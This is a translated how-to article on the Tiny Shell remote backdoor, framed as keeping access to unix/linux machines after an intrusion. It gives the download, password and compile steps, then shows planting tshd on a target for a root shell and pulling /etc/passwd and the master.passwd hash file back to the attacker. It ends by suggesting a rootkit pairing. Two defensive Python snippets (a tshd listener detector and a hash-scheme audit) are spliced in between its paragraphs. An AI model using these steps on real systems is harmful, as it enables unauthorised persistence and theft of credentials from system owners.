Tiny Shell Operating Instructions

Source: Internet
Author: User
Tags: sha1, strcmp, ssh

Tiny Shell is a lightweight standard remote shell tool. It provides remote command execution (in the manner of rlogin, telnet, ssh and the like) and file transfer (upload and download), has single-byte support, and fully supports pseudo-terminal pairs (pty/tty) and other pseudo-terminals.

I. Preface

As the Internet has grown, unix/linux systems have come into ever wider use, and breaking into a unix/linux system is no longer difficult. After a successful intrusion the attacker usually leaves one or more backdoors in order to get back in later. On unix/linux there are many kinds of backdoor. The elementary ones are modifying the .rhosts file, copying a shell into a hidden directory, or adding users to the /etc/passwd file. The higher-level approach is the kernel-module backdoor (rootkit), the most advanced and probably the most covert kind of backdoor on a unix/linux system; but today I am not going to talk about rootkits, because they are too complex to use and even harder to handle for anyone without unix/linux experience. Tiny Shell, a lightweight shell tool that runs on unix/linux, is not only small but also supports a number of other useful features, as described below.

II. Usage

1. Tiny Shell introduction

Tiny Shell is a lightweight standard remote shell tool. It provides remote command execution (in the manner of rlogin, telnet, ssh) and file transfer (upload and download), has single-byte support, and fully supports pseudo-terminal pairs (pty/tty) and other pseudo-terminals. It uses strong 160-bit RC4 encryption to avoid sniffer detection, together with AES-128 + HMAC-SHA1 for strong encryption and authentication. Supported systems include FreeBSD, NetBSD, OpenBSD, Solaris, SunOS, HP-UX, IRIX, Cygwin, Linux and others.

2. Tiny Shell in practice

Test environment:

    Local:  OpenBSD 3.4, IP 192.168.0.40
    Target: FreeBSD 4.9-STABLE, IP 192.168.0.20

First download the shell, unpack it and modify the source code so that the tool better fits our requirements:

    # fetch http://www.ringz.org/tsh-0.6.tgz
    # tar zxvf tsh-0.6.tgz
    # cd tsh-0.6
    # ls
    ChangeLog  README  aes.h  pel.h  sha1.h  tsh.h  Makefile  aes.c  pel.c  sha1.c  tsh.c  tshd.c
    # vi tsh.h

In tsh.h you find:

    char *secret = "replace with your password";

This is the password used to connect to the backdoor; I changed it to dahubaobao. The main program of the client is tsh.c; look first at the bottom of the source:

    if (password == NULL) {
        /* 1st try, using the built-in secret key */
        ret = pel_client_init(server, secret);

        if (ret != PEL_SUCCESS) {
            close(server);
            /* secret key invalid, so ask for a password */
            password = getpass("Password: ");
            goto connect;
        }
    }

The important line is ret = pel_client_init(server, secret): the secret variable is passed as a parameter, and it is the password required to connect to the backdoor. Now you know why tsh.h was changed.

    #define SERVER_PORT 7586    /* the port the backdoor listens on; change it as you like */

    if (argc == 5 && !strcmp(argv[2], "get")) {
        action = GET_FILE;
    }
    if (argc == 5 && !strcmp(argv[2], "put")) {
        action = PUT_FILE;
    }

This backdoor prints no help text, so it is from this code that we learn that get means download and put means upload. Of course you can change these keywords yourself if you like. If you want the backdoor to print help information, you can add a printf statement yourself. The simplest way: run ./tsh without any arguments and you are told "gethostbyname failed"; then look in the source for

    fprintf(stderr, "gethostbyname failed.\n");

and, as you may already have guessed, replace "gethostbyname failed" with the help text you want, so that running ./tsh prints the help automatically. That counts as a small disguise as well. Now compile the source.
    # make
    Please specify one of these targets:
        make linux
        make freebsd
        make openbsd
        make netbsd
        make cygwin
        make sunos
        make irix
        make hpux
        make osf
    # make openbsd

Choose the target that matches your system; compilation takes about ten seconds (see Figure 1). Two executables are then generated in the current directory: tsh (the client) and tshd (the server). Copy tshd to the target system (FreeBSD) and run ./tshd to complete the installation. To show the environment I use more clearly, I first run the id command locally: the user's uid is 1000, a regular user. Then ./tsh 192.168.0.20 connects to the target host (for convenience in testing I did not set a password). We now have a root shell: running id (note, on the target host this time) shows uid=0, which is root! Running uname -a reports a FreeBSD system, so the connection to the backdoor and the login have succeeded (see Figure 2).

The backdoor can also run a shell command at connection time, with the syntax ./tsh 192.168.0.20 "command". For example, ./tsh 192.168.0.20 "cat /etc/passwd" connects to the 192.168.0.20 target host and then runs cat /etc/passwd, giving us a look at the target's passwd file (Figure 3). Note, however, that in this form you do not log on to the target host; it only connects, runs the one shell command and returns.

Now let's look at upload and download. From the source code we know that the upload keyword is put and the download keyword is get. To upload a file, run ./tsh 192.168.0.20 put filename target-host-directory; note that the file must be in the current directory, that is, the same directory as tsh.
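Seen from the defender's side, the facts above give two simple indicators for a tshd listener: the default port from SERVER_PORT (7586) and the server binary name tshd. The following is an added example, not code from the original article or from the tsh project; it parses constructed sample lines in the layout of `ss -ltnp` output and flags rows that match either indicator. Both indicators are trivially changed (the article itself says the port is arbitrary), so a hit is a lead for investigation, not proof.

```python
import re

# Indicators taken from the article: tshd's default listening port
# (#define SERVER_PORT 7586) and the server binary name "tshd".
DEFAULT_TSHD_PORT = 7586
SUSPECT_PROCESS_NAMES = {"tshd"}

# Constructed sample in the layout of `ss -ltnp` on Linux (not real output).
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       5       0.0.0.0:7586         0.0.0.0:*          users:(("tshd",pid=4417,fd=4))
LISTEN  0       128     127.0.0.1:631        0.0.0.0:*          users:(("cupsd",pid=700,fd=7))
LISTEN  0       5       0.0.0.0:31337        0.0.0.0:*          users:(("tshd",pid=4418,fd=4))
"""

# Extracts the first process name and pid from the users:((...)) column.
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')


def parse_ss_listeners(text):
    """Return (port, process_name, pid) for each LISTEN row of ss -ltnp output."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        local = fields[3]                         # e.g. 0.0.0.0:7586 or [::]:22
        port = int(local.rsplit(":", 1)[1])       # rsplit keeps IPv6 addresses intact
        m = PROC_RE.search(line)
        name, pid = (m.group(1), int(m.group(2))) if m else (None, None)
        rows.append((port, name, pid))
    return rows


def find_tshd_indicators(text):
    """Flag listeners on the default tshd port or owned by a process named tshd."""
    findings = []
    for port, name, pid in parse_ss_listeners(text):
        reasons = []
        if port == DEFAULT_TSHD_PORT:
            reasons.append("default tshd port 7586")
        if name in SUSPECT_PROCESS_NAMES:
            reasons.append(f"process name {name!r}")
        if reasons:
            findings.append({"port": port, "process": name, "pid": pid, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_tshd_indicators(SAMPLE_SS_OUTPUT):
        print(f"pid {f['pid']} ({f['process']}) on port {f['port']}: {', '.join(f['reasons'])}")
```

On a real host, feed the function the actual output of `ss -ltnp` (Linux) and pair the result with a check of the listening process's binary on disk; the port and name heuristics alone will miss a renamed or re-ported tshd.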
I uploaded a binary called back with ./tsh 192.168.0.20 put back /, which places the file in the target's root directory, then connected to the target host with ./tsh 192.168.0.20 and ran ls to check that back had arrived on the other host (Figure 4). Not bad! As for downloading, the syntax is ./tsh 192.168.0.20 get target-file local-directory. Now let's fetch its most sensitive file, master.passwd (the shadow file, the equivalent of the shadow file on a Linux system). ./tsh 192.168.0.20 get /etc/master.passwd /home/dahubaobao downloads the target host's master.passwd to the local /home/dahubaobao directory; ls then shows that the other side's master.passwd is now local (Figure 5), and vi master.passwd (Figure 6) shows the users' password hashes in plain view. Hint: FreeBSD user passwords are hashed with MD5.
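The master.passwd format and the MD5 remark above suggest a routine audit an administrator would run on their own FreeBSD hosts: which accounts still carry an md5-crypt ($1$) hash, a traditional DES hash, or no password at all, so they can be migrated or locked. The following is an added example, not part of the original article; the master.passwd lines are constructed, and the prefix-to-scheme mapping follows the crypt(3) modular format ($1$ md5-crypt, $2a$/$2b$ bcrypt, $5$ sha256-crypt, $6$ sha512-crypt).

```python
# Constructed sample in FreeBSD master.passwd layout (not a real file):
# name:password:uid:gid:class:change:expire:gecos:home:shell
SAMPLE_MASTER_PASSWD = """\
root:$1$uJ2sQk9z$Lq7vB3XwZ1d0mNf9yTa0E.:0:0::0:0:Charlie &:/root:/bin/csh
dahubaobao:$6$qwertyuiop$hF3oSHOGsZg9x8Q1vHRxhK2W2aeVN7RkC6sdpJa0ZkqiuEa3X0jDfT2IRXCo0t5MX5xKQy2S9x7NgqQ1BpDzS1:1000:1000::0:0:Test user:/home/dahubaobao:/bin/sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
guest::1001:1001::0:0:Guest account:/home/guest:/bin/sh
"""

# crypt(3) modular-format prefixes. $1$ is md5-crypt, which the article notes
# FreeBSD of that era used for user passwords.
SCHEMES = {
    "$1$": "md5-crypt",
    "$2a$": "bcrypt",
    "$2b$": "bcrypt",
    "$5$": "sha256-crypt",
    "$6$": "sha512-crypt",
}

# Schemes an audit should flag: fast unsalted-era hashes and missing passwords.
WEAK = {"md5-crypt", "des-crypt", "empty"}


def classify_hash(field):
    """Name the hashing scheme of one master.passwd password field."""
    if field == "":
        return "empty"          # no password at all: anyone can log in as this user
    if field.startswith(("*", "!")):
        return "locked"         # not a valid hash, so password login is impossible
    for prefix, name in SCHEMES.items():
        if field.startswith(prefix):
            return name
    return "des-crypt"          # no $id$ prefix: traditional 13-character crypt, treat as weak


def audit_master_passwd(text):
    """Return one finding per account: user, scheme, and whether it needs attention."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 10:   # FreeBSD master.passwd has exactly ten fields
            continue
        user, pw_hash = fields[0], fields[1]
        scheme = classify_hash(pw_hash)
        findings.append({"user": user, "scheme": scheme, "weak": scheme in WEAK})
    return findings


if __name__ == "__main__":
    for f in audit_master_passwd(SAMPLE_MASTER_PASSWD):
        flag = "  <-- needs attention" if f["weak"] else ""
        print(f"{f['user']:<12} {f['scheme']}{flag}")
```

The audit reads only the scheme prefix, never the hash material itself, so it can be run from a privileged cron job and the report shared without copying master.passwd around, which is exactly the kind of exposure the article demonstrates.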

Summary

Tiny Shell, as a small shell tool, is in no way inferior to other shell tools, and it supports most unix/linux systems, so it is definitely worth a try. Of course, this backdoor is not hidden; it can be combined with a rootkit to strengthen it (rootkits also provide shell tools, but they do not compare with Tiny Shell; try it if you don't believe me). How to use a rootkit you can look up on Google; I won't say more about that here.
